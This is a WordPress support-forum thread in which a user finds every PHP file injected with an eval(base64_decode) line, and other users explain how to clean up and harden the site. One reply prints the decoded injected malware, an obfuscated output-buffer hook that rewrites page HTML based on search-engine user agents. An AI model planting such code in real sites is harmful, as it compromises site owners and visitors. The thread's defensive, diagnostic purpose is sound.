Title: eval(base64_decode HACKED
Last modified: August 19, 2016
---
# eval(base64_decode HACKED
* Resolved [alisamazing](https://wordpress.org/support/users/alisamazing/)
* (@alisamazing)
* [16 years, 4 months ago](https://wordpress.org/support/topic/evalbase64_decode-hacked/)
* guys,
* I’m having a nightmare, I’ve just had a look on my dashboard and it doesn’t look
right… everything is there but it is not styled. I then looked at code via the
appearance>editor option and notice that every single .php file has been altered
by the “eval(base64_decode” etc.
Here is what it looks like:-
*
* That is the first line in every .php file.
* My site doesn’t look to be affected [crazycreatures.org](http://www.crazycreatures.org)
I always keep up to date with wordpress I run 2.9.1 I use the Atahualpa Theme(
could this be the cause?)
* What steps do I take on WordPress? (I have already exported an XML today)
What
steps do I take on my host (godaddy.com)?
* I read somewhere that I need to backup databases and stuff I am not familiar
with code and stuff can someone please advise in baby steps? Also it seems other
people had a similar issue with this code on their PermaLinks, mine look fine.
* Any advice whatsoever greatly appreciated.
* Thanks
Viewing 12 replies - 1 through 12 (of 12 total)
* [Rev. Voodoo](https://wordpress.org/support/users/rvoodoo/)
* (@rvoodoo)
* [16 years, 4 months ago](https://wordpress.org/support/topic/evalbase64_decode-hacked/#post-1379083)
* argh….I hate that! You are in for a bit of a long day…
[http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
[http://ocaoimh.ie/did-your-wordpress-site-get-hacked/](http://ocaoimh.ie/did-your-wordpress-site-get-hacked/)
[http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
[http://www.snipe.net/2010/01/when-wordpress-gets-hacked/](http://www.snipe.net/2010/01/when-wordpress-gets-hacked/)
* And when you’re done:
[http://codex.wordpress.org/Hardening_WordPress](http://codex.wordpress.org/Hardening_WordPress)
* that reading will help you out. You need to delete the gibberesh from your wp-
config file. Reinstall WP (you might still be able to do it from your admin dashboard
if you are lucky, if not, do a manual install). Once you have the new WP in place,
delete all plugins and reinstall from clean downloads. Then reinstall your theme(
s). If you have a heavily customized theme with no backup, you have to manually
clean each file.
* That will get your WP clean. Then change ALL passwords (wp, db, ftp)
* Then you need to find out how this is happening. If you have godaddy, you have
access to your server access logs. Look at the timestamp on a PHP file that was
hacked. Now look at your server logs at that time/date and see how your files
were accessed. Chances are, your logs will lead you to a rogue php file, or maybe
more than one. Delete any files that don’t belong.
* And finally, if you have any more php files on your server (besides WP) investigate
them. They probably are all hacked and will need replaced or cleaned. good luck!
* Thread Starter [alisamazing](https://wordpress.org/support/users/alisamazing/)
* (@alisamazing)
* [16 years, 4 months ago](https://wordpress.org/support/topic/evalbase64_decode-hacked/#post-1379125)
* Thanks for the swift reply RVoodoo
* I’m backing up MySQL databases now, it is a lot of work and very time consuming.
* Will it be possible to recreate my site exactly like it was before or will there
be noticeable differences as far as the visitor is concerned. Also, I imagine
all this will require resubmitting sitemaps and such to google analytics etc.?
* Will let you know how it turns out.
* Thanks
* [Rev. Voodoo](https://wordpress.org/support/users/rvoodoo/)
* (@rvoodoo)
* [16 years, 4 months ago](https://wordpress.org/support/topic/evalbase64_decode-hacked/#post-1379126)
* you should be able to get things just the way they were. If you are lucky, your
database did not get harmed. Just make sure you are very thorough. If you miss
something, you may find yourself doing all this again in a week.
* Also, once all is clean….keep backups of all files, and of your DB….that way
in the future, if something goes south, you can just delete all the harmed stuff
and use your clean copies.
* [Samuel B](https://wordpress.org/support/users/samboll/)
* (@samboll)
* [16 years, 4 months ago](https://wordpress.org/support/topic/evalbase64_decode-hacked/#post-1379130)
* so what does the above code do exactly?
* here it is decoded:
* `if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']
=1; if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){
if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"
yahoo"))){ return ''; } return ""; } } if(!function_exists('gzdecode')){ function
gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D
=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9
=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&
4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,
10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[
1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;}
if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=
@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)
+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9
=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)
+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9
+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,
$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353==
=FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;}
return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){
Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode(
$RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
return preg_replace('/(\]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);}
else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh');}}`
Formatted version: [http://wordpress.pastebin.ca/1791392](http://wordpress.pastebin.ca/1791392)
* Thread Starter [alisamazing](https://wordpress.org/support/users/alisamazing/)
* (@alisamazing)
* [16 years, 4 months ago](https://wordpress.org/support/topic/evalbase64_decode-hacked/#post-1379141)
* I noticed that ‘samboll’ had this in the decode
* } } if(!**function**_exists(‘**gz**decode’)){ function **gz**decode($R5A9CF1B497502ACA23C8F611A564684C){
* Before I posted here I thought a reinstall of 2.9.1 might help. So I did this
via the Dashboard automatically. It told me the reinstall was successful, however
it had a Warning.
* Warning: gzuncompress() [function.gzuncompress]: data error in /home/content/
81/5291081/html/wp-includes/http.php on line 1825
* I guess this will be related??
* [Rev. Voodoo](https://wordpress.org/support/users/rvoodoo/)
* (@rvoodoo)
* [16 years, 4 months ago](https://wordpress.org/support/topic/evalbase64_decode-hacked/#post-1379155)
* it most likely related to the hack…yes.
* Last time I cleaned up, I had to reinstall WP….that got things working pretty
well. Then reinstalled my theme and plugins which got rid of all warnings (My
dashboard still looked bad, until I did a browser refresh ctrl+f5). Then I cleaned
up my wp-config, as that file doesn’t get replaced on an upgrade and still had
the dirty code in it…..
* After that all was well…..
* Thread Starter [alisamazing](https://wordpress.org/support/users/alisamazing/)
* (@alisamazing)
* [16 years, 4 months ago](https://wordpress.org/support/topic/evalbase64_decode-hacked/#post-1379486)
* Okay guys, thanks for your help so far, It looks a lot cleaner now and haven’t
seen any strange behaviour but following the info here:
[http://ocaoimh.ie/did-your-wordpress-site-get-hacked/](http://ocaoimh.ie/did-your-wordpress-site-get-hacked/)
* I checked my .htaccess file.
* Apparantly it should be:
* # BEGIN WordPress
RewriteEngine On RewriteBase / RewriteCond%{
REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.
php [L] # END WordPress
* Mine is:
* rewriteengine on
* # BEGIN WordPress
RewriteEngine On RewriteBase / RewriteCond%{
REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.
php [L]
* # END WordPress
rewritecond %{REQUEST_FILENAME} !-f rewritecond %{REQUEST_FILENAME}!-
d rewriterule . /index.php [L]
* Can I get rid of that rewrite stuff (with lowercase r)?
* Thanks all.
* [Samuel B](https://wordpress.org/support/users/samboll/)
* (@samboll)
* [16 years, 4 months ago](https://wordpress.org/support/topic/evalbase64_decode-hacked/#post-1379490)
* I think I would delete the `.htaccess` entirely and then regenerate your permalinks
with the same you have
admin – settings – permalinks
* [wpsecuritylock](https://wordpress.org/support/users/wpsecuritylock/)
* (@wpsecuritylock)
* [16 years, 3 months ago](https://wordpress.org/support/topic/evalbase64_decode-hacked/#post-1379543)
* I did a search on